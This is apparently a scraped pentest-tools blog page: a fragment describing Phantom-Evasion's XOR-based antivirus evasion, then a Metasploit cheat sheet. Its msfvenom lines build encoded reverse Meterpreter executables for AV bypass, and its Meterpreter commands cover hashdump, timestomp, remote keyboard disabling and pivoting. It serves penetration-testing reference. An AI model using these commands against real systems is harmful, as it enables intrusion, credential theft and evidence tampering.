multibyte (variable lenght) random keys Polymorphic C decoder stub.Triple Multibyte-key xor:Shellcode xored with the result of xor between two multibyte (variable lenght) random keys xored with a third multibyte random key. Polymorphic C decoder stub.Download Phantom-Evasion

Link: http://feedproxy.google.com/~r/PentestTools/~3/u2lYO11vEuc/phantom-evasion-python-av-evasion-tool.html

Metasploit Cheat Sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.Metasploit is a popular tool used by pentest experts.Metasploit :Search for module:msf > search [regex]Specify and exploit to use:msf > use exploit/[ExploitPath]Specify a Payload to use:msf > set PAYLOAD [PayloadPath]Show options for the current modules:msf > show optionsSet options:msf > set [Option] [Value]Start exploit:msf > exploit Useful Auxiliary ModulesPort Scanner:msf > use auxiliary/scanner/portscan/tcpmsf > set RHOSTS 10.10.10.0/24msf > runDNS Enumeration:msf > use auxiliary/gather/dns_enummsf > set DOMAIN target.tgtmsf > runFTP Server:msf > use auxiliary/server/ftpmsf > set FTPROOT /tmp/ftprootmsf > runProxy Server:msf > use auxiliary/server/socks4msf > run msfvenom :The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.$ msfvenom –p [PayloadPath]–f [FormatType]LHOST=[LocalHost (if reverse conn.)]LPORT=[LocalPort]Example :Reverse Meterpreter payload as an executable and redirected into a file:$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1LPORT=4444 > met.exeFormat Options (specified with –f) –help-formats – List available output formatsexe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C codeEncoding Payloads with msfvenomThe msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.$ msfvenom -p [Payload] -e [Encoder] -f[FormatType] -i [EncodeInterations]LHOST=[LocalHost (if reverse conn.)]LPORT=[LocalPort]ExampleEncode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -fexe LHOST=10.1.1.1 LPORT=4444 > mal.exeMetasploit MeterpreterBase Commands:? / help: Display a summary of commands exit / quit: Exit the Meterpreter sessionsysinfo: Show the system name and OS typeshutdown / reboot: Self-explanatoryFile System Commands:cd: Change directorylcd: Change directory on local (attacker’s) machinepwd / getwd: Display current working directoryls: Show the contents of the directorycat: Display the contents of a file on screendownload / upload: Move files to/from the target machinemkdir / rmdir: Make / remove directoryedit: Open a file in the default editor (typically vi)Process Commands:getpid: Display the process ID that Meterpreter is running inside.getuid: Display the user ID that Meterpreter is running with.ps: Display process list.kill: Terminate a process given its process ID.execute: Run a given program with the privileges of the process the Meterpreter is loaded in.migrate: Jump to a given destination process IDTarget process must have same or lesser privileges Target process may be a more stable process When inside a process, can access any files that process has a lock on. Network Commands:ipconfig: Show network interface informationportfwd: Forward packets through TCP sessionroute: Manage/view the system’s routing tableMisc Commands:idletime: Display the duration that the GUI of thetarget machine has been idle.uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.screenshot: Save as an image a screenshot of the target machine.Additional Modules:use [module]: Load the specified moduleExample:use priv: Load the priv modulehashdump: Dump the hashes from the boxtimestomp:Alter NTFS file timestampsManaging SessionsMultiple Exploitation:Run the exploit expecting a single session that is immediately backgrounded:msf > exploit -zRun the exploit in the background expecting one or more sessions that are immediately backgrounded:msf > exploit –jList all current jobs (usually exploit listeners):msf > jobs –lKill a job:msf > jobs –k [JobID]Multiple Sessions:List all backgrounded sessions:msf > sessions -lInteract with a backgrounded session:msf > session -i [SessionID]Background the current interactive session:meterpreter > ormeterpreter > backgroundRouting Through Sessions:All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.msf > route add [Subnet to Route To][Subnet Netmask] [SessionID]Metasploit Cheat Sheet

Link: http://www.kitploit.com/2019/02/metasploit-cheat-sheet.html